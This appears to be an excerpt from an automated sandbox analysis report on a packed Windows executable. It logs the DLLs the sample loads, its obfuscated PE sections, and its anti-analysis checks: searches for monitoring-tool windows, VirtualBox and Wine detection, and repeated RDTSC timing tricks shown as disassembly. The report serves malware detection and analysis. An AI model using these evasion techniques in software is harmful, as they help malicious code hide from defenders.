                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: mG83m82qhF.exeStatic file information: File size 2982400 > 1048576
                Source: mG83m82qhF.exeStatic PE information: Raw size of elrlqfzp is bigger than: 0x100000 < 0x2b0200

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\mG83m82qhF.exeUnpacked PE file: 0.2.mG83m82qhF.exe.410000.0.unpack :EW;.rsrc :W;.idata :W;elrlqfzp:EW;bgznktwl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;elrlqfzp:EW;bgznktwl:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: mG83m82qhF.exeStatic PE information: real checksum: 0x2e1b0e should be: 0x2e54e7
                Source: mG83m82qhF.exeStatic PE information: section name:
                Source: mG83m82qhF.exeStatic PE information: section name: .rsrc
                Source: mG83m82qhF.exeStatic PE information: section name: .idata
                Source: mG83m82qhF.exeStatic PE information: section name: elrlqfzp
                Source: mG83m82qhF.exeStatic PE information: section name: bgznktwl
                Source: mG83m82qhF.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19DD7 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B15700 push 8000A8CBh; retf 0_3_00B15705
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: C:\Users\user\Desktop\mG83m82qhF.exeCode function: 0_3_00B19EF5 push 8800B1C3h; ret 0_3_00B19FE1
                Source: mG83m82qhF.exeStatic PE information: section name: entropy: 7.981487191884987

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 468663 second address: 468667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E4228 second address: 5E4237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06687C5EE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E4237 second address: 5E4242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0668FAD1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E4242 second address: 5E4248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E4248 second address: 5E425B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0668FAD202h 0x0000000b jnp 00007F0668FAD1F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E3850 second address: 5E3854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E73A1 second address: 5E73C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E73C2 second address: 5E73C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E73C8 second address: 5E73CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E73CD second address: 5E73D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E73D3 second address: 5E73D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E75A3 second address: 5E75EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F06687C5EE6h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F06687C5EECh 0x00000011 pop ecx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov edi, edx 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D27A1h], ecx 0x00000020 call 00007F06687C5EE9h 0x00000025 jno 00007F06687C5EF6h 0x0000002b push eax 0x0000002c push ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E75EF second address: 5E75F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E75F3 second address: 5E767D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F06687C5EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jnc 00007F06687C5EE8h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007F06687C5EF8h 0x0000001f push esi 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 jmp 00007F06687C5EF7h 0x0000002d pop eax 0x0000002e cld 0x0000002f mov dword ptr [ebp+122D3338h], eax 0x00000035 push 00000003h 0x00000037 push eax 0x00000038 mov edi, dword ptr [ebp+122D2F8Ch] 0x0000003e pop edx 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+122D20C5h], eax 0x00000047 mov ecx, 32FC6E57h 0x0000004c push 00000003h 0x0000004e or edi, dword ptr [ebp+122D2ED8h] 0x00000054 call 00007F06687C5EE9h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E767D second address: 5E7681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E7681 second address: 5E7687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E7687 second address: 5E768D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E768D second address: 5E76A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06687C5EEDh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E76A5 second address: 5E76BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F0668FAD1F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F0668FAD1F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E76BE second address: 5E76DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a jno 00007F06687C5EE8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E76DA second address: 5E76E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E76E8 second address: 5E76EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E76EC second address: 5E7745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b mov si, 3653h 0x0000000f lea ebx, dword ptr [ebp+12453262h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F0668FAD1F8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f adc esi, 58932AFDh 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jnl 00007F0668FAD1F6h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E7745 second address: 5E7749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E7749 second address: 5E774F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5E781A second address: 5E786B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007F06687C5EFDh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F06687C5EF8h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push eax 0x0000001b jbe 00007F06687C5EE6h 0x00000021 pop eax 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5F8EFE second address: 5F8F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 607850 second address: 607876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b jmp 00007F06687C5EF7h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 605DE3 second address: 605DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 606790 second address: 60679F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06687C5EE6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6068DA second address: 6068E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6068E1 second address: 6068E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6068E7 second address: 6068EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D47AA second address: 5D47AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 606FB0 second address: 606FBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0668FAD1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 60F175 second address: 60F17B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 60F17B second address: 60F181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 60F181 second address: 60F199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F06687C5EF2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D2C4B second address: 5D2C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0668FAD1F6h 0x0000000a jmp 00007F0668FAD209h 0x0000000f rdtsc
